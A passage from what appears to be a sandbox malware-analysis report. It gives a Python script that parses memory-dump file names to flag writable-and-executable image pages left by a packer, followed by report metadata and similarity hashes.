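    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
    0x80: "PAGE_EXECUTE_WRITECOPY",
}
# Modifier bits that may be OR-ed into a protection value.
PAGE_MODIFIERS = {0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE"}
# Region type constants as reported by VirtualQuery.
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

_NAME = re.compile(
    r"^(?P<f1>[0-9a-f]{8})\.(?P<f2>[0-9a-f]{8})\.(?P<f3>\d+)\."
    r"(?P<base>[0-9a-f]{16})\.(?P<prot>[0-9a-f]{8})\.(?P<f6>[0-9a-f]{8})\."
    r"(?P<type>[0-9a-f]{8})\.(?P<f8>[0-9a-f]{8})\.sdmp$",
    re.IGNORECASE,
)


@dataclass(frozen=True)
class DumpRegion:
    name: str
    base: int       # region start address (field 4)
    protect: int    # raw protection value (field 5, assumed)
    mem_type: int   # raw region type (field 7, assumed)

    @property
    def protect_name(self) -> str:
        names = [PAGE_PROTECT.get(self.protect & 0xFF, f"0x{self.protect & 0xFF:x}")]
        names += [n for bit, n in PAGE_MODIFIERS.items() if self.protect & bit]
        return "|".join(names)

    @property
    def mem_type_name(self) -> str:
        return MEM_TYPE.get(self.mem_type, f"0x{self.mem_type:x}")

    @property
    def executable(self) -> bool:
        return bool(self.protect & 0xF0)   # X, XR, XRW, XWC

    @property
    def writable(self) -> bool:
        return bool(self.protect & 0xCC)   # RW, WC, XRW, XWC (copy-on-write counts)


def parse_dump_name(name: str) -> DumpRegion:
    """Split a dump file name into its assumed fields; raise on anything else."""
    m = _NAME.match(name)
    if not m:
        raise ValueError(f"not a Joe Sandbox dump name: {name}")
    return DumpRegion(
        name=name,
        base=int(m["base"], 16),
        protect=int(m["prot"], 16),
        mem_type=int(m["type"], 16),
    )


def writable_executable_image_pages(names, image_base: int):
    """Return (RVA, protection name) for image-backed regions that are both
    writable and executable, sorted by RVA. A normally linked PE has no such
    pages; they appear when a packer changes section rights to unpack in place."""
    hits = []
    for n in names:
        r = parse_dump_name(n)
        if r.mem_type_name == "MEM_IMAGE" and r.writable and r.executable:
            hits.append((r.base - image_base, r.protect_name))
    return sorted(hits)


# Names copied from the report listing; 0x530000 is the reported source offset.
SAMPLE_NAMES = [
    "00000000.00000002.1950536384.0000000000530000.00000004.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1950554236.0000000000531000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1950613457.000000000059A000.00000080.00000001.01000000.00000003.sdmp",
]
IMAGE_BASE = 0x530000

if __name__ == "__main__":
    for n in SAMPLE_NAMES:
        r = parse_dump_name(n)
        print(f"{r.base:#010x} {r.protect_name:24} {r.mem_type_name}")
    print(writable_executable_image_pages(SAMPLE_NAMES, IMAGE_BASE))
```

Feed it the full list of Associated names above and it yields the RVAs of every W+X page, which can be compared directly against the section table of the on-disk file.exe to see which sections had their rights changed at runtime. The header page at RVA 0 decodes as PAGE_READWRITE and is not flagged, since it is writable but not executable.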
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 94795bc2b5e125ed7f94a2b38a375f57ba4a3d08ffe8c04190bce415e6229dd0
                                                            • Instruction ID: 171b60d3f6e4efebdf613261d80b172ac3d7dba45c1aef209de671a3009a7a8d
                                                            • Opcode Fuzzy Hash: 94795bc2b5e125ed7f94a2b38a375f57ba4a3d08ffe8c04190bce415e6229dd0
                                                            • Instruction Fuzzy Hash: 8EC09B34A5D040CBC644CF86F8D1571A7FD571720CB10343A9707F7261D560D449B70D